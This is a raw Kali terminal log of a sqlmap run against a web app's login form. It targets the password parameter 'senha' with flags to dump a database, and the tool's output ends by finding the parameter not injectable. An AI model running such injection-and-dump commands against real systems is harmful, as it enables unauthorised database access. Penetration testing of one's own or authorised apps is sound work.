root@kali:~# sqlmap -u "http://segapp.app/login" --data="email=diego@segapp&senha=x&submitLogin=Enviar" -p senha --flush-session --random-agent -D dbteste --all --batch        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.1.4#stable}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:34:09

[21:34:09] [INFO] fetched random HTTP User-Agent header from file '/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR) AppleWebKit/525+ (KHTML, like Gecko) Version/3.0 Safari/523.15'
[21:34:09] [INFO] flushing session file
[21:34:09] [INFO] testing connection to the target URL
[21:34:09] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[21:34:09] [INFO] testing if the target URL is stable
[21:34:10] [INFO] t[38;1H[?1049l[?1l>:34:10] [WARNING] heuristic (basic) test shows that POST parameter 'senha' might not be injectable
[21:34:10] [INFO] testing for SQL injection on POST parameter 'senha'
[21:34:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:34:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[21:34:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[21:34:10] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[21:34:10] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[21:34:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[21:34:10] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[21:34:10] [INFO] testing 'MySQL inline queries'
[21:34:11] [INFO] testing 'PostgreSQL inline queries'
[21:34:11] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[21:34:11] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[21:34:11] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[21:34:11] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[21:34:11] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[21:34:11] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[21:34:11] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[21:34:11] [INFO] testing 'Oracle AND time-based blind'
[21:34:11] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[21:34:11] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it with option '--dbms'
[21:34:12] [WARNING] POST parameter 'senha' does not seem to be injectable
[21:34:12] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp'). If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')

[*] shutting down at 21:34:12
